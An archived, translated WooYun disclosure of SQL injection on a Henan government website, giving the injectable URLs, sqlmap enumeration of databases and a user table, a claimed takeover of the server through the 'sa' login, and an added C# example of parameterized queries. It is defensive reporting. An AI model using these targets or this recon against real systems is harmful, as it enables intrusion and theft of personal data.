
Defect ID: wooyun-2015-0137146

Vulnerability title: SQL injection on the main site of a Population and Family Planning Commission in Henan Province, escalating to command execution (large amount of user information)

Affected vendor: a Population and Family Planning Commission in Henan Province

Vulnerability author: 泪雨无魂

Submitted: 2015-08-28 17:51

Fixed: 2015-10-12 16:06

Published: 2015-10-12 16:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 14

Vulnerability status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-28: details sent to the vendor, awaiting vendor handling
2015-08-28: vendor confirmed; details disclosed to the vendor only
2015-09-07: details disclosed to core white hats and relevant domain experts
2015-09-17: details disclosed to regular white hats
2015-09-27: details disclosed to intern white hats
2015-10-12: details disclosed to the public

Brief description:

SQL injection on the main site of a Population and Family Planning Commission in Henan Province; the database login is SA and the server has already been taken over...

Detailed description:

Injection points:
http://www.xxsjsw.gov.cn/HNWeb/conference/09zrpxbmore.aspx?category=202 has a SQL injection vulnerability
http://www.xxsjsw.gov.cn/hnweb/conference/08dsdhhymore.aspx?category=156 has a SQL injection vulnerability

web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2005
available databases [11]:
[*] bakdata
[*] distribution
[*] hnjsw35
[*] hnweb
[*] hx
[*] info
[*] master
[*] model
[*] msdb
[*] tempdb
[*] test
current user: 'sa'
current database: 'hnweb'
database management system users password hashes:
Database: hnweb
[28 tables]
+--------------+
| Code |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| HNClass |
| HNFileName |
| HNNews |
| HNUsers |
| HNVideo |
| HnReplyXf |
| HnUserXf |
| HnXingFang |
| RTLCode |
| RTLReport |
| RTLUserLogin |
| __orm__ |
| comd_list |
| comment |
| counts |
| dtproperties |
| guestbook |
| ldemail |
| t_jiaozhu |
| vote |
| webset |
| xiaolu |
| xxzxvote |
| zixun |
+--------------+
Database: hnweb
Table: HNUsers
[11 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| Authority | varchar |
| BM | nvarchar |
| Email | varchar |
| RealName | varchar |
| RegeditTime | datetime |
| Status | char |
| Telephone | varchar |
| UnitName | varchar |
| UserID | int |
| UserName | varchar |
| UserPsw | varchar |
+-------------+----------+
Database: hnweb
Table: HNUsers
[105 entries]



Proof of vulnerability:

Because the database login is SA, a shell was obtained directly, and the SA privileges were then used to take over the server...



This was only a test; no damage was intended...
Please don't come knocking on my door...

Fix:

You know what to do.
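The fix section gives no specifics, so the following is an added example (not the site's own code) of the two changes that close this class of finding: the query behind a `category=` parameter in its injectable string-concatenated form beside the parameterized form, run under a dedicated low-privilege login rather than sa. The table name, column names, login name and connection string are assumptions chosen for illustration.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Hypothetical reconstruction of a "category" lookup on an ASPX page (not the real code).
public static class ConferenceRepository
{
    // Assumed connection string: a dedicated login with SELECT only on the tables the
    // page needs. Never 'sa': with sa, any injection reaches xp_cmdshell and the OS.
    private const string ConnectionString =
        "Server=.;Database=hnweb;User Id=hnweb_app;Password=<placeholder>;Encrypt=True;";

    // VULNERABLE: the raw query-string value becomes part of the SQL text, so
    // "category=202" can be rewritten into arbitrary statements executed as the DB login.
    public static DataTable GetConferencesUnsafe(string category)
    {
        string sql = "SELECT Id, Title FROM Conference WHERE Category = " + category;
        using (var conn = new SqlConnection(ConnectionString))
        using (var adapter = new SqlDataAdapter(sql, conn))
        {
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }

    // HARDENED: the value is validated as the expected type and bound as a typed
    // parameter, so the SQL text is fixed no matter what the client sends.
    public static DataTable GetConferences(string categoryRaw)
    {
        if (!int.TryParse(categoryRaw, out int category) || category < 0)
            throw new ArgumentException("category must be a non-negative integer");

        const string sql = "SELECT Id, Title FROM Conference WHERE Category = @category";
        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@category", SqlDbType.Int).Value = category;
            using (var adapter = new SqlDataAdapter(cmd))
            {
                var table = new DataTable();
                adapter.Fill(table);
                return table;
            }
        }
    }
}
```

The same pattern applies to every other query on the site; the sqlmap output above also shows the HNUsers table storing UserPsw in clear text, which should be replaced by a salted password hash once the injection is closed.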

Copyright notice: when reposting, please credit the source: 泪雨无魂@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-08-28 16:05

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Henan branch center, which will coordinate follow-up handling with the organisation that manages the website.

Latest status:

None yet